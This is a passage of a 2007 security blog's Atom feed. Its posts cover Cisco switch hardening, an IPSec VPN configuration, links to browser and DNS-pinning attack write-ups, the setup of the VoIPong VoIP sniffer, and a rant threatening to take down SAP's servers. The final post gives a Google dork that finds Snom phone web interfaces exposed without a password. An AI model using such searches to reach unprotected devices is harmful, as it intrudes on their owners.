rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-8284010034028353691</id><published>2007-07-27T15:13:00.000+08:00</published><updated>2007-07-27T15:33:34.839+08:00</updated><title type='text'>Basic Cisco Switches Auditing Guidelines</title><content type='html'>1. Always use VLANs to create collision domains to limit broadcast traffic. Remember that VLAN 1 is the admin VLAN, used for administrative purposes; avoid using VLAN 1, to prevent hackers who plug into unused ports from communicating with the rest of the network.&lt;br /&gt;&lt;br /&gt;2. Avoid using auto-trunking mode. Dynamic Trunking Protocol allows VLAN hopping attacks, where hackers are able to communicate in various VLANs. Assign trunk interfaces a native VLAN other than VLAN 1.&lt;br /&gt;&lt;br /&gt;3. Make sure Spanning Tree Protocol is protected against attacks. Enable portfast, bpdufilter, bpduguard and root guard on the switches.&lt;br /&gt;&lt;br /&gt;4. Disable all unused ports on the switch to prevent hackers from plugging into unused ports to communicate with the rest of the network.&lt;br /&gt;&lt;br /&gt;5. Turn off VLAN Trunking Protocol if not in use. If required, VTP should be used with passwords enabled.&lt;br /&gt;&lt;br /&gt;6.
Review the network configuration to set thresholds that limit multicast and broadcast traffic on switch ports.&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-8284010034028353691?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/8284010034028353691/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=8284010034028353691' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8284010034028353691'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8284010034028353691'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/07/basic-cisco-switches-auditing.html' title='Basic Cisco Switches Auditing Guidelines'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-4935010064772990972</id><published>2007-07-25T14:09:00.000+08:00</published><updated>2007-07-25T14:18:05.965+08:00</updated><title type='text'>Remote Command Exec (FireFox 2.0.0.5)</title><content type='html'>These days, I am reading about web application hacking and trying out several different things. I happened to stumble across xs-sniper's page and read his post on owning most major browsers. It appears that there is a problem with Cross Application Browser Scripting, where a flaw in the URI handling behavior allows for remote command execution.
Be sure to check out his post below:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://xs-sniper.com/blog/remote-command-exec-firefox-2005/"&gt;http://xs-sniper.com/blog/remote-command-exec-firefox-2005/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-4935010064772990972?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/4935010064772990972/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=4935010064772990972' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4935010064772990972'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4935010064772990972'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/07/remote-command-exec-firefox-2005-et-al.html' title='Remote Command Exec (FireFox 2.0.0.5)'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2747132525105929860</id><published>2007-07-19T16:28:00.000+08:00</published><updated>2007-07-19T19:08:14.119+08:00</updated><title type='text'>Thanks Chr1stian, Google Store flaw?</title><content type='html'>The other night i was talking to &lt;a href="http://christ1an.blogspot.com/"&gt;Chr1stian&lt;/a&gt; about XSS and google. We were chatting and suddenly the topic got more and more interesting. 
But anyway, Chr1stian is really a kind soul and a very nice person to talk with. He taught me a lot of things which I didn't understand and guided me slowly through each step. Thank you Chr1stian for your patience; I can say that now I understand at least 90% of what you taught me. Also, we were talking about how security doesn't make money, about flaws in Google, and about how Google did not correct most of the holes that were reported by him. &lt;br /&gt;&lt;br /&gt;I am sure that if I got a chance to test the Google application, I would find more flaws; however, because of my work schedule, I don't really have the time to play around. Anyway, I still wanna say thanks to Chr1stian, don't forget our deal. :)&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2747132525105929860?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2747132525105929860/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2747132525105929860' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2747132525105929860'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2747132525105929860'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/07/thanks-chr1stian-google-store-flaw.html' title='Thanks Chr1stian, Google Store flaw?'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16'
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-9157147125038486156</id><published>2007-07-17T10:47:00.000+08:00</published><updated>2007-07-17T15:24:27.493+08:00</updated><title type='text'>The Web Application Hackers Handbook: Discovering and Exploiting Security Flaws</title><content type='html'>Sorry for the lack of updates. Recently, I had been reading a lot of books about web hacking and RFID and neglected blogging. It's due to the nature of my work that I have to report what I do every day. However, just yesterday, I had a small chat with the author of the famous Burp proxy and realised that he published a book called "The Web Application Hackers Handbook: Discovering and Exploiting Security Flaws". According to him, this was what he said: "Our book aims to be the most comprehensive and deep guide to hacking web applications available. It covers numerous advanced topics like blind SQL/other injection, obscure logic flaws, attacking multi-stage authentication, new attacks against webusers, ViewState tampering, decompilation of thick client components, source code review, use of bespoke automation, and many more." As usual, I would always buy books to read and this one is not to be missed. If someone can guarantee me that his book is good, with experience in developing tools and giving talks at Black Hat, then I will spend that kind of money in buying his books. 
Well, let me know what you guys think.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp1.blogger.com/_Zx8XWzC_KPQ/Rpw82nwJx6I/AAAAAAAAAaw/WRBuNKPiJAo/s1600-h/WAHH.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp1.blogger.com/_Zx8XWzC_KPQ/Rpw82nwJx6I/AAAAAAAAAaw/WRBuNKPiJAo/s200/WAHH.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5088008588103370658" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-9157147125038486156?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/9157147125038486156/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=9157147125038486156' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/9157147125038486156'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/9157147125038486156'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/07/web-application-hackers-handbook.html' title='The Web Application Hackers Handbook: Discovering and Exploiting Security Flaws'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_Zx8XWzC_KPQ/Rpw82nwJx6I/AAAAAAAAAaw/WRBuNKPiJAo/s72-c/WAHH.jpg' height='72'
width='72'/><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-3174495247959166693</id><published>2007-07-04T14:04:00.000+08:00</published><updated>2007-07-04T14:07:55.719+08:00</updated><title type='text'>IPSec VPN in PIX/ASA</title><content type='html'>For those of you who want to set up an IPSec VPN connection on the PIX/ASA firewall, below is a snapshot of the commands showing how to do it.&lt;br /&gt;&lt;br /&gt;crypto ipsec transform-set hacker esp-aes-256 esp-sha-hmac &lt;br /&gt;crypto dynamic-map dynmap 20 set transform-set hacker&lt;br /&gt;crypto map hacker 10 ipsec-isakmp&lt;br /&gt;crypto map hacker 10 match address IPSEC_hackers&lt;br /&gt;crypto map hacker 10 set peer 111.111.111.111&lt;br /&gt;crypto map hacker 10 set transform-set hackerZ&lt;br /&gt;crypto map hacker 20 ipsec-isakmp dynamic dynmap&lt;br /&gt;crypto map hacker client authentication LOCAL&lt;br /&gt;crypto map hacker interface outside&lt;br /&gt;isakmp enable outside&lt;br /&gt;isakmp key ******** address 111.111.111.111 netmask 255.255.255.255 no-xauth no-config-mode &lt;br /&gt;isakmp identity address&lt;br /&gt;isakmp nat-traversal 20&lt;br /&gt;isakmp policy 10 authentication pre-share&lt;br /&gt;isakmp policy 10 encryption aes-256&lt;br /&gt;isakmp policy 10 hash sha&lt;br /&gt;isakmp policy 10 group 1&lt;br /&gt;isakmp policy 10 lifetime 86400&lt;br /&gt;isakmp policy 20 authentication pre-share&lt;br /&gt;isakmp policy 20 encryption 3des&lt;br /&gt;isakmp policy 20 hash md5&lt;br /&gt;isakmp policy 20 group 2&lt;br /&gt;isakmp policy 20 lifetime 86400&lt;br /&gt;vpngroup crm525gp address-pool vpnpool&lt;br /&gt;vpngroup crm525gp idle-time 1800&lt;br /&gt;vpngroup crm525gp max-time 86400&lt;br /&gt;vpngroup crm525gp password ********&lt;br /&gt;vpngroup helpgrp address-pool vpnpool2&lt;br /&gt;vpngroup helpgrp idle-time 1800&lt;br /&gt;vpngroup helpgrp max-time 86400&lt;br /&gt;vpngroup helpgrp password ********&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-3174495247959166693?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/3174495247959166693/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=3174495247959166693' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3174495247959166693'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3174495247959166693'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/07/ipsec-vpn-in-pixasa.html' title='IPSec VPN in PIX/ASA'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2355169356494687805</id><published>2007-07-04T00:22:00.000+08:00</published><updated>2007-07-04T00:31:13.829+08:00</updated><title type='text'>DNS Pinning Exposed</title><content type='html'>Christ1an wrote a very detailed article on anti-anti-anti DNS pinning, or you can just call it DNS pinning. For those who are still confused or still find it complicated to understand, this article explains it with a step-by-step approach with pictures attached. In it he covers the whole DNS pinning issue and how it actually works to attack a web browser. 
Check it out here: &lt;a href="http://christ1an.blogspot.com/2007/07/dns-pinning-explained.html"&gt;http://christ1an.blogspot.com/2007/07/dns-pinning-explained.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2355169356494687805?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2355169356494687805/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2355169356494687805' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2355169356494687805'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2355169356494687805'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/07/dns-pinning-exposed.html' title='DNS Pinning Exposed'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-8089802115598282076</id><published>2007-07-02T17:27:00.000+08:00</published><updated>2007-07-02T17:39:30.929+08:00</updated><title type='text'>VoIP article ready soon</title><content type='html'>I am in the midst of writing my VoIP article for hakin9 magazine and, frankly speaking, I am very restless these days. Still, I am forcing myself to quickly write this article so it can be published soon, for those VoIP auditors to give a comment, or for anyone who is interested in auditing VoIP services. 
Well, this article is easy to understand and it is not going to be tough to learn the techniques described. For a beginner, you will find this a useful yet interesting article; for an expert, this is not for you. I plan to write a more in-depth and advanced article in future if I have the resources and time. I will keep you guys updated on the status once it is published. &lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-8089802115598282076?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/8089802115598282076/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=8089802115598282076' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8089802115598282076'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8089802115598282076'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/07/voip-article-ready-soon.html' title='VoIP article ready soon'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-1639787700053674346</id><published>2007-06-29T15:07:00.000+08:00</published><updated>2007-06-29T19:10:56.980+08:00</updated><title type='text'>Youtube's 40+ security vulnerabilities</title><content type='html'>The other night I was chatting with Christ1an about web security and I just happened to realise that he was 
actually the one who killed Youtube. Some of you might already have known that he was the one who discovered around 40+ vulnerabilities in Youtube and became famous overnight. Anyway, Christ1an is based in Germany and he is only a student, but hack, he is a guru in web security. He was interviewed by the &lt;a href="http://www.theregister.co.uk/2007/06/20/youtube_security_ultimatum/"&gt;register&lt;/a&gt; and &lt;a href="http://www.google.com/corporate/security.html"&gt;google&lt;/a&gt; actually thanked him for his work. &lt;br /&gt;&lt;br /&gt;Recently Christ1an launched &lt;a href="http://planet-websecurity.org/"&gt;http://planet-websecurity.org/&lt;/a&gt; with the intention of bringing together similarly themed news and rants related to Web security and displaying them in one place. Visit his blog on the right side of my feed or check it out &lt;a href="http://christ1an.blogspot.com/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-1639787700053674346?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/1639787700053674346/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=1639787700053674346' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1639787700053674346'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1639787700053674346'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/06/youtubes-40-security-vulnerabilities.html' title='Youtube&apos;s 40+ security vulnerabilities'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-8838290193069475997</id><published>2007-06-28T00:48:00.000+08:00</published><updated>2007-06-28T01:02:32.670+08:00</updated><title type='text'>SAP</title><content type='html'>I always wanted to work for SAP because they pay huge money. I remember I was interviewed by SAP back in Singapore. During the first interview, it took me at least 1-2 hours of conversation and I passed the interview. The HR invited me for a second interview; however, this time, the interviewer was crap. He asked all sorts of questions and I succinctly answered them without beating around the bush. It's either he didn't get what I was trying to say or he is just plain talkative. I held strongly to my roots for what I said and he did not believe me, saying that I am a perfect candidate for the position and look like what they are searching for. ALL BLOODY CRAP!!!! A bunch of liars. They truly antagonize me and I loathe them for that. I am a straight person; if you don't wish to hire me, that's fine, just tell me straight and I will understand. You don't have to set up a bunch of stories and be a coward. &lt;br /&gt;&lt;br /&gt;Well, good luck to you SAP. If I have a chance to audit your system, I promise I will bring down all your SAP/R3 servers and other external servers you have. Better protect your RFC or you will be OWNED! 
&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-8838290193069475997?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/8838290193069475997/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=8838290193069475997' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8838290193069475997'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8838290193069475997'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/06/sap.html' title='SAP'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-4188290005202334535</id><published>2007-06-27T12:05:00.000+08:00</published><updated>2007-06-27T17:17:37.418+08:00</updated><title type='text'>Cisco show mem vs show processes memory sorted</title><content type='html'>To check the router or firewall CPU usage and memory usage, I always issue show mem or show processes cpu to see what is causing the router to have high CPU or memory utilization. However, I realised that the show mem command output is not as nice as it seemed to be. I was looking at the ioshints blog and found the same command with a few tweaks here and there. This command provides a better output than show mem, which is very important for troubleshooting purposes. 
See below:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;show processes memory sorted&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;show processes cpu sorted 1min&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;show processes cpu sorted 7min&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;From cisco:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.cisco.com/warp/public/63/showproc_cpu.html"&gt;http://www.cisco.com/warp/public/63/showproc_cpu.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.cisco.com/warp/public/63/highcpu.html"&gt;http://www.cisco.com/warp/public/63/highcpu.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;For Cisco and Juniper commands:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://networking.ringofsaturn.com/Cisco/ciscojuniper.php"&gt;http://networking.ringofsaturn.com/Cisco/ciscojuniper.php&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-4188290005202334535?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/4188290005202334535/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=4188290005202334535' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4188290005202334535'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4188290005202334535'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/06/cisco-show-mem-vs-show-processes-memory.html' title='Cisco show mem vs show processes memory sorted'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16'
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2825885053342929611</id><published>2007-06-26T17:03:00.000+08:00</published><updated>2007-06-26T17:10:47.679+08:00</updated><title type='text'>Designing and Implementing Linux Firewalls with QoS using netfilter, iproute2, NAT and l7-filter</title><content type='html'>I was invited by Lucian to review this book. Lucian actually sent me a copy of this book to read and I was happy upon receiving it. Well, I am someone who loves firewall and security stuff, especially Linux and Cisco. This book is absolutely amazing. For beginners, there are a lot of technical configurations you can read and learn from, and for experts, this book will guide you to some topics that might interest you. I would really want to put this book into practice; however, based on my current situation, I will only have the time to read and understand the concepts. I would highly rate this book at 4.5/5 and recommend it to anyone who wants to learn firewalls at a low level.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp0.blogger.com/_Zx8XWzC_KPQ/RoDYCAIqNvI/AAAAAAAAAXo/eoyviHx_-ok/s1600-h/firewall.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/RoDYCAIqNvI/AAAAAAAAAXo/eoyviHx_-ok/s200/firewall.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5080297908581578482" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2825885053342929611?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2825885053342929611/comments/default' title='Post Comments'/><link rel='replies' type='text/html'
href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2825885053342929611' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2825885053342929611'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2825885053342929611'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/06/designing-and-implementing-linux.html' title='Designing and Implementing Linux Firewalls with QoS using netfilter, iproute2, NAT and l7-filter'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_Zx8XWzC_KPQ/RoDYCAIqNvI/AAAAAAAAAXo/eoyviHx_-ok/s72-c/firewall.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-8044642744108090023</id><published>2007-06-26T13:42:00.000+08:00</published><updated>2007-06-26T13:45:18.511+08:00</updated><title type='text'>VoIPong installation error</title><content type='html'>For those of you who try to install VoIPong and get installation errors like the ones below, the problem and solution are provided as shown:&lt;br /&gt;&lt;br /&gt;Murat Balaban &lt;murat@...&gt; writes:&lt;br /&gt;&lt;br /&gt;&gt; &lt;br /&gt;&gt; Hi Henrique,&lt;br /&gt;&gt; &lt;br /&gt;&gt; Which UNIX user is trying to run voipong? It seems a non-root&lt;br /&gt;&gt; user is running it, but does not have the sufficient privileges&lt;br /&gt;&gt; to open the ethernet device in promisc mode.&lt;br /&gt;&gt; &lt;br /&gt;&gt; Plus, you seem to have problems with the permissions of&lt;br /&gt;&gt; your modules directory. 
That directory should be owned by&lt;br /&gt;&gt; the same user running voipong.&lt;br /&gt;&gt; &lt;br /&gt;&gt; Thursday, May 31, 2007, 8:41:56 PM, you wrote:&lt;br /&gt;&gt; &lt;br /&gt;&gt; &gt; Release 2.0, running on DINP70759 [Linux 2.4.25-klg #1&lt;br /&gt;&gt; &gt; SMP Ter Abr 6 09:28:24 BRT 2004 i686]&lt;br /&gt;&gt; &lt;br /&gt;&gt; &gt; (c) Murat Balaban http://www.enderunix.org/&lt;br /&gt;&gt; &gt; 31/05/07 14:34:14: EnderUNIX VOIPONG Voice Over IP&lt;br /&gt;&gt; &gt; Sniffer starting...&lt;br /&gt;&gt; &gt; 31/05/07 14:34:14: Release 2.0 running on DINP70759&lt;br /&gt;&gt; &gt; [Linux 2.4.25-klg #1 SMP Ter Abr 6 09:28:24 BRT 2004&lt;br /&gt;&gt; &gt; i686]. (c) Murat Balaban http://www.enderunix.org/&lt;br /&gt;&gt; &gt; [pid: 669]&lt;br /&gt;&gt; &gt; 31/05/07 14:34:14: Default matching algorithm: lfp&lt;br /&gt;&gt; &gt; 31/05/07 14:34:14: error:&lt;br /&gt;&gt; &gt; securemod(/usr/local/etc/voipong/modules/modvocoder_pcma.so):&lt;br /&gt;&gt; &gt; gid: got 50, expected 0&lt;br /&gt;&gt; &gt; 31/05/07 14:34:14: error:&lt;br /&gt;&gt; &gt; securemod(/usr/local/etc/voipong/modules/modvocoder_pcmu.so):&lt;br /&gt;&gt; &gt; gid: got 50, expected 0&lt;br /&gt;&gt; &gt; 31/05/07 14:34:14: loaded 0 module(s)&lt;br /&gt;&gt; &gt; 31/05/07 14:34:14: libpcap start failure:&lt;br /&gt;&gt; &gt; pcap_open_live: SIOCGIFHWADDR: No such device&lt;br /&gt;&gt; &lt;br /&gt;&gt; &gt; 31/05/07 14:34:14: PID 669 [parent: 653]: exited with&lt;br /&gt;&gt; &gt; code: 1. 
uptime: .&lt;br /&gt;&gt; &lt;br /&gt;I had the same problems and I solved them using this command:&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;sudo chown -R root:root /usr/local/etc/voipong/modules/modvocoder_pcm*&lt;/span&gt;&lt;br /&gt;Also for the voipongnets, I created the file with &lt;br /&gt;&lt;span style="font-weight:bold;"&gt;touch /usr/local/etc/voipong/voipongnets &lt;/span&gt;&lt;br /&gt;This will solve the error above.&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-8044642744108090023?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/8044642744108090023/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=8044642744108090023' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8044642744108090023'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8044642744108090023'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/06/voipong-installation-error.html' title='VoIPong installation error'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-8687376048708663293</id><published>2007-06-25T15:59:00.000+08:00</published><updated>2007-06-25T17:16:50.943+08:00</updated><title type='text'>Snom phones web interface exposed to public.</title><content type='html'>I was just researching hard and soft phones and I came across &lt;a href="http://www.snom.com/"&gt;Snom VoIP&lt;/a&gt; phones. I don't know much about the phones; however, a simple Google dork gave me a bad result. Default installations of the phone are not password protected. Check it out:&lt;br /&gt;&lt;br /&gt;"(e.g. 0114930398330)" snom&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a 